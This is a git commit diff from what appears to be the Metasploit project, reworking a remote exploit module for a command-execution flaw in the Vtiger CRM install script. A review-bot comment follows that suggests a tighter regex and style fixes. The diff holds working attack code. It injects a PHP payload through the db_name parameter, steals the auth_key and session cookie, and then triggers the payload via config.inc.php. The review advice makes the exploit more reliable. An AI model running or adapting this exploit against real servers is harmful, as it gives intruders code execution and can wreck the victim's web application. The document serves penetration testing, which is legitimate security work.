Fix everything that needs to be fixed

bug/bundler_fix
sinn3r 2014-04-08 14:57:42 -05:00
parent ca7dcc0781
commit 4012dd0acc
1 changed files with 49 additions and 46 deletions


@ -6,7 +6,9 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # Application database configuration is overwritten
# Application database configuration is overwritten
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
@ -16,12 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
Vtiger install script. This module is set to ManualRanking due to this
module overwriting the target database configuration, which may introduce target
instability.
module overwriting the target database configuration, which may result in
a broken web app, and you may not be able to get a session again.
},
'Author' =>
[
'Jonathan Borgeaud < research[at]navixia.com >', # Navixia Research Team
'Jonathan Borgeaud < research[at]navixia.com >' # Navixia Research Team
],
'License' => MSF_LICENSE,
'References' =>
@ -51,62 +53,63 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def uri
return target_uri.path
end
def check
return Exploit::CheckCode::Unsupported
end
def exploit
print_status("Injecting payload...")
rand_arg = Rex::Text.rand_text_hex(10)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' =>
{
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
'vars_get' => {
'module' => 'Install',
'view' => 'Index',
'mode' => 'Step5',
'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // ",
},
'headers' => {'X-Requested-With' => 'whatever'}
})
'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // "
}})
re_authkey='(name)(=)(")(auth_key)(")(\\s+)(value)(=)(").*?((?:[a-z0-9]*))(")'
m=Regexp.new(re_authkey,Regexp::IGNORECASE);
# Check timeout
if not res
print_error("Request timed out, please try again")
return
end
if m.match(res.body)
authkey=m.match(res.body)[10]
if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i
authkey = $1
phpsessid = res.get_cookies
print_status("Retrieved Authkey : #{authkey}");
print_status("Retrieved PHPSESSID : #{phpsessid}");
if authkey.blank?
print_error("No AuthKey found")
return
elsif phpsessid.blank?
print_error("No PHP Session ID found")
return
end
print_status("Retrieved Authkey : #{authkey}")
print_status("Retrieved PHPSESSID : #{phpsessid}")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
'cookie' => phpsessid,
'vars_get' =>
{
'module' => 'Install',
'view' => 'Index',
'mode' => 'Step7',
'auth_key' => authkey
},
'headers' => {'X-Requested-With' => 'pwned'},
'cookie' => phpsessid
}
})
print_status("Executing payload...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'config.inc.php'),
'vars_get' =>
{
rand_arg => '1',
}
'uri' => normalize_uri(target_uri.path, 'config.inc.php'),
'vars_get' => { rand_arg => '1' }
})
else
print_error("No auth_key pattern found")
end
end
end
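Review bot: The new auth_key match at `if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i` can silently yield a truncated or empty capture, because the lazy `.*?` before the group skips any leading characters the character class does not accept and `[a-z0-9]*` also accepts an empty string; the later `authkey.blank?` guard only catches the empty case, not a partial key, and the Step7 request would then be sent with a wrong token. A stricter capture that fails outright instead, `if res.body =~ /name="auth_key"\s+value="([a-z0-9]+)"/i`, keeps the existing "No auth_key pattern found" branch meaningful, and `authkey = Regexp.last_match(1)` is preferable to the bare `$1` global. The `if not res` timeout check a few lines above reads more idiomatically as `unless res`. The "Retrieved PHPSESSID" message presumably reports whatever `res.get_cookies` returns, which may include more than the session cookie; if that is the case the label should say "cookies" rather than PHPSESSID.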